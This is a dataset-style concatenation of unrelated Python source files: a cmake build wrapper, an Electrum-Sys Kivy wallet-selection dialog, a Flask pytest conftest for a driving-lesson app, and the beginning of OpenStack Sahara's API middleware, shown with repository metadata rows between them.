cmdLine += ' -D{}={}'.format(key, defines[key])
cmdLine += ' -B' + build_dir
cmdLine += ' -H' + project_dir
print(cmdLine)
res = subprocess.call(cmdLine, cwd=build_dir, shell=True)
return res == 0
#------------------------------------------------------------------------------
def run_build(fips_dir, target, build_type, build_dir, num_jobs=1) :
"""run cmake in build mode
:param target: build target, can be None (builds all)
:param build_type: CMAKE_BUILD_TYPE string (e.g. Release, Debug)
:param build_dir: path to the build directory
:param num_jobs: number of parallel jobs (default: 1)
:returns: True if cmake returns successful
"""
cmdLine = 'cmake --build . --config {}'.format(build_type)
if target :
cmdLine += ' --target {}'.format(target)
if platform.system() == 'Windows' :
cmdLine += ' -- /nologo /verbosity:minimal /maxcpucount:{}'.format(num_jobs)
else :
cmdLine += ' -- -j{}'.format(num_jobs)
print(cmdLine)
res = subprocess.call(cmdLine, cwd=build_dir, shell=True)
return res == 0
#------------------------------------------------------------------------------
def run_clean(fips_dir, build_dir) :
"""run cmake in build mode
:param build_dir: path to the build directory
:returns: True if cmake returns successful
"""
try :
res = subprocess.call('cmake --build . --target clean', cwd=build_dir, shell=True)
return res == 0
except (OSError, subprocess.CalledProcessError) :
return False
| 40.923077 | 95 | 0.555686 |
acfa61b0f37151aefa904a1ba28a7bdd93ea8867 | 78 | py | Python | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | cqh_file_watcher/__main__.py | chen19901225/cqh_file_watcher | 48e0c177934a836551851e619926096074d64353 | [
"MIT"
] | null | null | null | from cqh_file_watcher.run import main
if __name__ == "__main__":
main()
| 13 | 37 | 0.705128 |
acfa62ae8efe16c6c552b67ad693ad2676bedc8a | 2,108 | py | Python | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrum | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | 1 | 2019-06-26T16:51:43.000Z | 2019-06-26T16:51:43.000Z | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrumsys | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | null | null | null | electrumsys/gui/kivy/uix/dialogs/wallets.py | syscoin/electrumsys | ac576539c758640ff87ed6be1311eb57b57d205f | [
"MIT"
] | 1 | 2018-09-10T21:43:02.000Z | 2018-09-10T21:43:02.000Z | import os
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from electrumsys.util import base_units
from electrumsys.storage import StorageReadWriteError
from ...i18n import _
from .label_dialog import LabelDialog
Builder.load_string('''
<WalletDialog@Popup>:
title: _('Wallets')
id: popup
path: ''
disable_new: True
BoxLayout:
orientation: 'vertical'
padding: '10dp'
FileChooserIconView:
id: wallet_selector
dirselect: False
filter_dirs: True
filter: '*.*'
path: root.path
rootpath: root.path
size_hint_y: 0.6
Widget
size_hint_y: 0.1
GridLayout:
cols: 3
size_hint_y: 0.1
Button:
id: new_button
disabled: root.disable_new
size_hint: 0.1, None
height: '48dp'
text: _('New')
on_release:
popup.dismiss()
root.new_wallet(wallet_selector.path)
Button:
id: open_button
size_hint: 0.1, None
height: '48dp'
text: _('Open')
disabled: not wallet_selector.selection
on_release:
popup.dismiss()
root.callback(wallet_selector.selection[0])
''')
class WalletDialog(Factory.Popup):
def __init__(self, path, callback, disable_new):
Factory.Popup.__init__(self)
self.path = path
self.callback = callback
self.disable_new = disable_new
def new_wallet(self, dirname):
assert self.disable_new is False
def cb(filename):
if not filename:
return
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
self.callback(os.path.join(dirname, filename))
d = LabelDialog(_('Enter wallet name'), '', cb)
d.open()
| 28.876712 | 103 | 0.555977 |
acfa6330ff76bbe00adf1ef3baff1c24a00e4f4e | 7,855 | py | Python | tests/conftest.py | brayest/testcode | 865d31ccfaf75946620c36955cc3dcb395515796 | [
"Unlicense"
] | 652 | 2021-01-24T10:32:08.000Z | 2022-02-05T09:14:10.000Z | tests/conftest.py | starhappy/Dryvo | 14c549a4f2265afd515bfd6f5f477a68187ea287 | [
"Unlicense"
] | 1 | 2021-01-27T05:09:14.000Z | 2021-02-01T06:21:05.000Z | tests/conftest.py | starhappy/Dryvo | 14c549a4f2265afd515bfd6f5f477a68187ea287 | [
"Unlicense"
] | 147 | 2021-01-25T10:57:22.000Z | 2022-02-05T09:14:12.000Z | import json
import random
import string
import tempfile
from datetime import datetime, timedelta
from pathlib import Path
import flask
import flask.testing
import pytest
import responses as responses_module
from server import create_app
from server.api.database import close_db, db, reset_db
from server.api.database.models import (
Appointment,
Place,
PlaceType,
Student,
Teacher,
Topic,
User,
WorkDay,
Car,
)
from server.api.social import SocialNetwork, social_networks_classes
DEMO_API_KEY = "ccbd100c5bcd1b3d31aaa33851917ca45a251d41988d6c6a3a9e0c68b13d47c2"
@pytest.fixture
def app() -> flask.Flask:
with open(Path.cwd() / "tests" / "service-account.json", "r") as f:
firebase_json = f.read()
with tempfile.NamedTemporaryFile() as db_f:
# create the app with common test config
app = create_app(
TESTING=True,
SECRET_KEY="VERY_SECRET",
SQLALCHEMY_DATABASE_URI=f"sqlite:///{db_f.name}",
FIREBASE_JSON=firebase_json,
SECRET_JWT="VERY_VERY_SECRET",
FLASK_DEBUG=1,
FACEBOOK_TOKEN="test",
FACEBOOK_CLIENT_SECRET="test",
FACEBOOK_CLIENT_ID="test",
)
with app.app_context():
db.init_app(app)
reset_db(db)
setup_db(app)
yield app
close_db()
def setup_db(app):
User.create(
email="t@test.com", password="test", name="test", area="test", phone="044444444"
)
User.create(
email="admin@test.com",
password="test",
name="admin",
area="test",
is_admin=True,
phone="055555555",
)
teacher_user = User.create(
email="teacher@test.com", password="test", name="teacher", area="test"
)
teacher = Teacher.create(
user=teacher_user,
price=100,
lesson_duration=40,
is_approved=True,
crn=999999999,
invoice_api_key=DEMO_API_KEY,
)
Car.create(teacher=teacher, number=1111111111)
student_user = User.create(
email="student@test.com", password="test", name="student", area="test"
)
student = Student.create(
user=student_user, teacher=teacher, creator=teacher.user, is_approved=True
)
meetup = Place.create(
description="test",
used_as=PlaceType.meetup.value,
student=student,
google_id="ID1",
)
dropoff = Place.create(
description="test",
used_as=PlaceType.dropoff.value,
student=student,
google_id="ID2",
)
WorkDay.create(
teacher=teacher,
day=1,
from_hour=0,
to_hour=23,
to_minutes=59,
on_date=(datetime.utcnow() + timedelta(days=2)).date(),
) # 2 days from now
Topic.create(title="topic test", min_lesson_number=1, max_lesson_number=5)
Appointment.create(
teacher=teacher,
student=student,
# schedule to 5 days from now to it won't bother with no test
creator=teacher.user,
duration=40,
date=(datetime.utcnow() + timedelta(days=5)),
meetup_place=meetup,
dropoff_place=dropoff,
)
@pytest.fixture
def db_instance(app: flask.Flask):
with app.app_context():
yield db
@pytest.fixture
def user(app: flask.Flask):
with app.app_context():
yield User.query.filter_by(email="t@test.com").one()
@pytest.fixture
def admin(app: flask.Flask):
with app.app_context():
yield User.query.filter_by(email="admin@test.com").one()
class Requester:
def __init__(self, client):
self.headers = {"Authorization": ""}
self._client = client
def post(self, url, **kwargs):
return self.request("POST", url, **kwargs)
def get(self, url, **kwargs):
return self.request("GET", url, **kwargs)
def put(self, url, **kwargs):
return self.request("PUT", url, **kwargs)
def delete(self, url, **kwargs):
return self.request("DELETE", url, **kwargs)
def request(self, method, url, **kwargs):
# overwrite instance auth header with the params?
if "headers" in kwargs:
self.headers.update(kwargs.pop("headers"))
return self._client.open(url, method=method, headers=self.headers, **kwargs)
class AuthActions(object):
def __init__(self, client):
self._client = client
self.refresh_token = ""
self.auth_token = ""
def login(self, email="t@test.com", password="test"):
return self.start_auth_session(
"POST", "/login/direct", json={"email": email, "password": password}
)
def register(
self,
email="test@test.com",
password="test",
name="test",
area="test",
phone="0511111111",
):
return self.start_auth_session(
"POST",
"/login/register",
data={
"email": email,
"password": password,
"name": name,
"area": area,
"phone": phone,
},
)
def logout(self, **kwargs):
logout = self._client.post(
"/login/logout", json={"refresh_token": self.refresh_token}, **kwargs
)
self._client.headers["Authorization"] = ""
return logout
def start_auth_session(self, method, endpoint, **kwargs):
""" Inserts the response token to the header
for continue using that instance as authorized user"""
req = self._client.request(method, endpoint, **kwargs)
self.auth_token = req.json.get("auth_token")
self.refresh_token = req.json.get("refresh_token")
if self.auth_token:
self._client.headers["Authorization"] = "Bearer " + self.auth_token
return req
class TestClient(flask.testing.FlaskClient):
"""Fix for SQLAlchemy sessions
https://stackoverflow.com/questions/51016103/unable-to-retrieve-database-objects-in-flask-test-case-session"""
def open(self, *args, **kwargs):
if "json" in kwargs:
kwargs["data"] = json.dumps(kwargs.pop("json"))
kwargs["content_type"] = "application/json"
return super(TestClient, self).open(*args, **kwargs)
@pytest.fixture
def client(app):
app.test_client_class = TestClient
return app.test_client()
@pytest.fixture
def requester(client):
return Requester(client)
@pytest.fixture
def auth(requester):
return AuthActions(requester)
@pytest.fixture
def teacher(app):
with app.app_context():
yield Teacher.query.first()
@pytest.fixture
def student(app):
with app.app_context():
yield Student.query.first()
@pytest.fixture
def meetup(app, student):
with app.app_context():
yield (
Place.query.filter_by(student=student)
.filter_by(used_as=PlaceType.meetup.value)
.first()
)
@pytest.fixture
def dropoff(app, student):
with app.app_context():
yield (
Place.query.filter_by(student=student)
.filter_by(used_as=PlaceType.dropoff.value)
.first()
)
@pytest.fixture
def topic(app):
with app.app_context():
yield Topic.query.first()
@pytest.fixture
def lesson(app):
with app.app_context():
yield Appointment.query.first()
@pytest.fixture
def car(app):
with app.app_context():
yield Car.query.first()
@pytest.fixture
def fake_token():
return "".join(
[random.choice(string.ascii_letters + string.digits) for n in range(32)]
)
@pytest.fixture
def responses():
with responses_module.RequestsMock() as rsps:
yield rsps
@pytest.fixture(params=social_networks_classes)
def social_network(request) -> SocialNetwork:
return request.param
| 25.838816 | 114 | 0.615786 |
acfa6416c7149314d5f5462c5878d2a7f0045771 | 299 | py | Python | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | PYTHON/pythonTeste/aula15.py | Santos1000/Curso-Python | 549223a1633f6f619c87554dd8078cf7841bb1df | [
"MIT"
] | null | null | null | '''cont = 1
while cont <= 10:
print(cont,'-> ',end='')
cont += 1
print('Acabou')'''
'''n = 0
while n != 999:
n = int(input('Digite um numero:'))'''
'''n = s = 0
while True:
n = int(input('Digite um numero:'))
if n == 999:
break
s += n
print(f'A soma vale {s}')'''
| 15.736842 | 42 | 0.474916 |
acfa6420f926103a9caee4630e1552df40ef3567 | 322 | py | Python | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | example.py | kikejimenez/docker_pyppeteer | fc142a7eb0aed2054e084d9c433e3386f6d378d5 | [
"MIT"
] | null | null | null | import asyncio
from pyppeteer import launch
async def main():
browser = await launch(args=['--no-sandbox'])
page = await browser.newPage()
await page.goto('https://github.com/')
await page.screenshot({'path': 'example.png'})
await browser.close()
asyncio.get_event_loop().run_until_complete(main()) | 24.769231 | 51 | 0.695652 |
acfa64465470ff1c9548eec1acffea2a609de622 | 4,826 | py | Python | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | 2 | 2020-05-21T14:24:16.000Z | 2020-12-03T19:56:34.000Z | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | gen/generator_test.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | """Tests for generator_script.py
Currently just testing ``fetch_and_update_spec()``
with the 5 different calling combinations of parameters, plus the error case.
"""
from unittest.mock import patch
import pytest
from gen.generator_script import fetch_and_update_spec
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_1_spec_from_api(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
get_spec_from_api.return_value = ({"host": "apteco.com"}, "1.2.3.4567")
version = fetch_and_update_spec(url="https://example1.com/OrbitAPI")
assert version == "1.2.3.4567"
get_spec_from_api.assert_called_once_with("https://example1.com/OrbitAPI")
get_spec_from_file.assert_not_called()
update_spec.assert_called_once_with({"host": "apteco.com"})
update_orbit_spec_version_number.assert_called_once_with("1.2.3.4567")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_2_spec_from_file(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
get_spec_from_file.return_value = ({"host": "localhost"}, "1.3.5.79ac")
version = fetch_and_update_spec(filepath="assets/api_specs/OrbitAPI-spec-1.3.5.79ac.json")
assert version == "1.3.5.79ac"
get_spec_from_api.assert_not_called()
get_spec_from_file.assert_called_once_with("assets/api_specs/OrbitAPI-spec-1.3.5.79ac.json", None)
update_spec.assert_called_once_with({"host": "localhost"})
update_orbit_spec_version_number.assert_called_once_with("1.3.5.79ac")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_3_spec_from_file_supply_version(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
get_spec_from_file.return_value = ({"host": "127.0.0.1"}, "8.6.4.20")
version = fetch_and_update_spec(filepath="data/api_specs/OrbitAPI-spec-latest.json", version="8.6.4.20")
assert version == "8.6.4.20"
get_spec_from_api.assert_not_called()
get_spec_from_file.assert_called_once_with("data/api_specs/OrbitAPI-spec-latest.json", "8.6.4.20")
update_spec.assert_called_once_with({"host": "127.0.0.1"})
update_orbit_spec_version_number.assert_called_once_with("8.6.4.20")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_4_version_only(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
version = fetch_and_update_spec(version="my manual version")
assert version == "my manual version"
get_spec_from_api.assert_not_called()
get_spec_from_file.assert_not_called()
update_spec.assert_not_called()
update_orbit_spec_version_number.assert_called_once_with("my manual version")
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_5_no_update(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
version = fetch_and_update_spec()
assert version is None
get_spec_from_api.assert_not_called()
get_spec_from_file.assert_not_called()
update_spec.assert_not_called()
update_orbit_spec_version_number.assert_not_called()
@patch("gen.generator_script.update_orbit_spec_version_number")
@patch("gen.generator_script.update_spec")
@patch("gen.generator_script.get_spec_from_file")
@patch("gen.generator_script.get_spec_from_api")
def test_error_both_url_and_filepath(
get_spec_from_api,
get_spec_from_file,
update_spec,
update_orbit_spec_version_number,
):
with pytest.raises(ValueError) as exc_info:
version = fetch_and_update_spec(
url="https://example1.com/OrbitAPI",
filepath="data/api_specs/OrbitAPI-spec-latest.json",
)
exception_msg = exc_info.value.args[0]
assert exception_msg == "Can only specify one of url or filepath"
get_spec_from_api.assert_not_called()
get_spec_from_file.assert_not_called()
update_spec.assert_not_called()
update_orbit_spec_version_number.assert_not_called()
| 35.226277 | 108 | 0.77932 |
acfa649f81be9d52d437cb5551be5401ce059097 | 88 | py | Python | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | 2 | 2015-07-18T21:43:23.000Z | 2019-10-28T01:00:00.000Z | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | null | null | null | src/test/test.py | diethack/diethack | 2fa40270efc30264f648fc36bc6b1d8342c4e0a3 | [
"MIT"
] | null | null | null | from unitsTest import *
import unittest
if __name__ == '__main__':
unittest.main()
| 14.666667 | 26 | 0.715909 |
acfa64ccf3f46108e651cbb4d59ff635c47af9bf | 9,076 | py | Python | examples/advanced/autowrap_integrators.py | benjaminmcdonald/sympy | dc44dcc6d6d5f2d0a7ede35eff5f421ab4b11a3e | [
"BSD-3-Clause"
] | 1 | 2016-07-13T04:30:25.000Z | 2016-07-13T04:30:25.000Z | examples/advanced/autowrap_integrators.py | jegerjensen/sympy | 3a43310f1957a21a6f095fe2801cc05b5268a2c7 | [
"BSD-3-Clause"
] | null | null | null | examples/advanced/autowrap_integrators.py | jegerjensen/sympy | 3a43310f1957a21a6f095fe2801cc05b5268a2c7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in Sympy to
create fast, numerical integration routines callable from python. See in the
code for detailed explanations of the various steps. An autowrapped sympy
expression can be significantly faster than what you would get by applying a
sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For the
sake of demonstration, this will be done by setting up a simple numerical
integration scheme as a Sympy expression, and obtain a binary implementation
with autowrap.
You need to have numpy installed to run this example, as well as a working
fortran compiler. If you have pylab installed, you will be rewarded with a
nice plot in the end.
[0]: http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
try:
import numpy as np
except ImportError:
sys.exit("Cannot import numpy. Exiting.")
try:
import pylab
except ImportError:
pylab = None
print "Couldn't import pylab"
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
basis_dimension = 5 # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1 # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1 # the quantum number `l` for angular momentum
hydrogen_n = 2 # the nodal quantum number for the Hydrogen wave
rmax = 20 # cut off in the radial direction
gridsize = 200 # number of points in the grid
# ***************************************************************************
def main():
print __doc__
# arrays are represented with IndexedBase, indices with Idx
m = Symbol('m', integer=True)
i = Idx('i', m)
A = IndexedBase('A')
B = IndexedBase('B')
x = Symbol('x')
print "Compiling ufuncs for radial harmonic oscillator solutions"
# setup a basis of ho-solutions (for l=0)
basis_ho = {}
for n in range(basis_dimension):
# Setup the radial ho solution for this n
expr = R_nl(n, orbital_momentum_l, omega2, x)
# Reduce the number of operations in the expression by eval to float
expr = expr.evalf(15)
print "The h.o. wave function with l = %i and n = %i is" % (
orbital_momentum_l, n)
pprint(expr)
# implement, compile and wrap it as a ufunc
basis_ho[n] = ufuncify(x, expr)
# now let's see if we can express a hydrogen radial wave in terms of
# the ho basis. Here's the solution we will approximate:
H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))
# The transformation to a different basis can be written like this,
#
# psi(r) = sum_i c(i) phi_i(r)
#
# where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
# and c(i) are scalar coefficients.
#
# So in order to express a hydrogen solution in terms of the H.O. basis, we
# need to determine the coefficients c(i). In position space, it means
# that we need to evaluate an integral:
#
# psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
#
# To calculate the integral with autowrap, we notice that it contains an
# element-wise sum over all vectors. Using the Indexed class, it is
# possible to generate autowrapped functions that perform summations in
# the low-level code. (In fact, summations are very easy to create, and as
# we will see it is often necessary to take extra steps in order to avoid
# them.)
# we need one integration ufunc for each wave function in the h.o. basis
binary_integrator = {}
for n in range(basis_dimension):
#
# setup basis wave functions
#
# To get inline expressions in the low level code, we attach the
# wave function expressions to a regular Sympy function using the
# implemented_function utility. This is an extra step needed to avoid
# erronous summations in the wave function expressions.
#
# Such function objects carry around the expression they represent,
# but the expression is not exposed unless explicit measures are taken.
# The benefit is that the routines that searches for repeated indices
# in order to make contractions will not search through the wave
# function expression.
psi_ho = implemented_function('psi_ho',
Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))
# We represent the hydrogen function by an array which will be an input
# argument to the binary routine. This will let the integrators find
# h.o. basis coefficients for any wave function we throw at them.
psi = IndexedBase('psi')
#
# setup expression for the integration
#
step = Symbol('step') # use symbolic stepsize for flexibility
# let i represent an index of the grid array, and let A represent the
# grid array. Then we can approximate the integral by a sum over the
# following expression (simplified rectangular rule, ignoring end point
# corrections):
expr = A[i]**2*psi_ho(A[i])*psi[i]*step
if n==0:
print "Setting up binary integrators for the integral:"
pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))
# But it needs to be an operation on indexed objects, so that the code
# generators will recognize it correctly as an array.
# expr = expr.subs(x, A[i])
# Autowrap it. For functions that take more than one argument, it is
# a good idea to use the 'args' keyword so that you know the signature
# of the wrapped function. (The dimension m will be an optional
# argument, but it must be present in the args list.)
binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])
# Lets see how it converges with the grid dimension
print "Checking convergence of integrator for n = %i" %n
for g in range(3, 8):
grid, step = np.linspace(0, rmax, 2**g, retstep=True)
print "grid dimension %5i, integral = %e" % (2**g,
binary_integrator[n](grid, H_ufunc(grid), step))
print "A binary integrator has been set up for each basis state"
print "We will now use them to reconstruct a hydrogen solution."
# Note: We didn't need to specify grid or use gridsize before now
grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)
print "Calculating coefficients with gridsize = %i and stepsize %f" %(
len(grid), stepsize)
coeffs = {}
for n in range(basis_dimension):
coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
print "c(%i) = %e" % (n, coeffs[n])
print "Constructing the approximate hydrogen wave"
hydro_approx = 0
all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i'%n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print "Error estimate: the element with largest deviation misses by %f" % diff
if diff > 0.01:
print "This is much, try to increase the basis size or adjust omega"
else:
print "Ah, that's a pretty good approximation!"
# Check visually
if pylab:
print "Here's a plot showing the contribution for each n"
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print """Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
"""
if __name__ == '__main__':
main()
| 38.295359 | 82 | 0.649405 |
acfa6500668b24729fb2a0fbf76d12ddb3627026 | 4,711 | py | Python | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | scripts/nettop.py | Mezantrop74/psutil-andoid | 978b673c48dc0422ea3ee3267a13b0e24e88e07a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# $Id: iotop.py 1160 2011-10-14 18:50:36Z g.rodola@gmail.com $
#
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Shows real-time network statistics.
Author: Giampaolo Rodola' <g.rodola@gmail.com>
$ python scripts/nettop.py
-----------------------------------------------------------
total bytes: sent: 1.49 G received: 4.82 G
total packets: sent: 7338724 received: 8082712
wlan0 TOTAL PER-SEC
-----------------------------------------------------------
bytes-sent 1.29 G 0.00 B/s
bytes-recv 3.48 G 0.00 B/s
pkts-sent 7221782 0
pkts-recv 6753724 0
eth1 TOTAL PER-SEC
-----------------------------------------------------------
bytes-sent 131.77 M 0.00 B/s
bytes-recv 1.28 G 0.00 B/s
pkts-sent 0 0
pkts-recv 1214470 0
"""
import atexit
import time
import sys
try:
import curses
except ImportError:
sys.exit('platform not supported')
import psutil
# --- curses stuff
def tear_down():
win.keypad(0)
curses.nocbreak()
curses.echo()
curses.endwin()
win = curses.initscr()
atexit.register(tear_down)
curses.endwin()
lineno = 0
def print_line(line, highlight=False):
"""A thin wrapper around curses's addstr()."""
global lineno
try:
if highlight:
line += " " * (win.getmaxyx()[1] - len(line))
win.addstr(lineno, 0, line, curses.A_REVERSE)
else:
win.addstr(lineno, 0, line, 0)
except curses.error:
lineno = 0
win.refresh()
raise
else:
lineno += 1
# --- curses stuff
def bytes2human(n):
"""
>>> bytes2human(10000)
'9.8 K'
>>> bytes2human(100001221)
'95.4 M'
"""
symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i + 1) * 10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.2f %s' % (value, s)
return '%.2f B' % (n)
def poll(interval):
"""Retrieve raw stats within an interval window."""
tot_before = psutil.net_io_counters()
pnic_before = psutil.net_io_counters(pernic=True)
# sleep some time
time.sleep(interval)
tot_after = psutil.net_io_counters()
pnic_after = psutil.net_io_counters(pernic=True)
return (tot_before, tot_after, pnic_before, pnic_after)
def refresh_window(tot_before, tot_after, pnic_before, pnic_after):
"""Print stats on screen."""
global lineno
# totals
print_line("total bytes: sent: %-10s received: %s" % (
bytes2human(tot_after.bytes_sent),
bytes2human(tot_after.bytes_recv))
)
print_line("total packets: sent: %-10s received: %s" % (
tot_after.packets_sent, tot_after.packets_recv))
# per-network interface details: let's sort network interfaces so
# that the ones which generated more traffic are shown first
print_line("")
nic_names = list(pnic_after.keys())
nic_names.sort(key=lambda x: sum(pnic_after[x]), reverse=True)
for name in nic_names:
stats_before = pnic_before[name]
stats_after = pnic_after[name]
templ = "%-15s %15s %15s"
print_line(templ % (name, "TOTAL", "PER-SEC"), highlight=True)
print_line(templ % (
"bytes-sent",
bytes2human(stats_after.bytes_sent),
bytes2human(
stats_after.bytes_sent - stats_before.bytes_sent) + '/s',
))
print_line(templ % (
"bytes-recv",
bytes2human(stats_after.bytes_recv),
bytes2human(
stats_after.bytes_recv - stats_before.bytes_recv) + '/s',
))
print_line(templ % (
"pkts-sent",
stats_after.packets_sent,
stats_after.packets_sent - stats_before.packets_sent,
))
print_line(templ % (
"pkts-recv",
stats_after.packets_recv,
stats_after.packets_recv - stats_before.packets_recv,
))
print_line("")
win.refresh()
lineno = 0
def main():
try:
interval = 0
while True:
args = poll(interval)
refresh_window(*args)
interval = 1
except (KeyboardInterrupt, SystemExit):
pass
if __name__ == '__main__':
main()
| 28.379518 | 73 | 0.545319 |
acfa651ded1286d65c37a9ddabae0ae0ae6832f3 | 2,765 | py | Python | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | sahara/api/middleware/sahara_middleware.py | ngohoa211/sahara | 0ba85a2247476d5f484bc626c0dc3cc0ba3cc986 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import flask
from oslo_config import cfg
import six
from werkzeug import exceptions as werkzeug_exceptions
from sahara.api import v10 as api_v10
from sahara.api import v11 as api_v11
from sahara.api import v2 as api_v2
from sahara import context
from sahara.utils import api as api_utils
CONF = cfg.CONF
def build_app():
"""App builder (wsgi).
Entry point for Sahara REST API server
"""
app = flask.Flask('sahara.api')
@app.teardown_request
def teardown_request(_ex=None):
context.set_ctx(None)
app.register_blueprint(api_v10.rest, url_prefix='/v1.0')
app.register_blueprint(api_v10.rest, url_prefix='/v1.1')
app.register_blueprint(api_v11.rest, url_prefix='/v1.1')
class _JSONErrorHandler(dict):
def __getitem__(self, ex):
status_code = (ex.code
if isinstance(ex, werkzeug_exceptions.HTTPException)
else 500)
description = (ex.description
if isinstance(ex, werkzeug_exceptions.HTTPException)
else str(ex))
return api_utils.render({'error': status_code,
'error_message': description},
status=status_code)
make_json_error = _JSONErrorHandler()
for code in six.iterkeys(werkzeug_exceptions.default_exceptions):
app.register_error_handler(code, make_json_error)
return app
def build_v2_app():
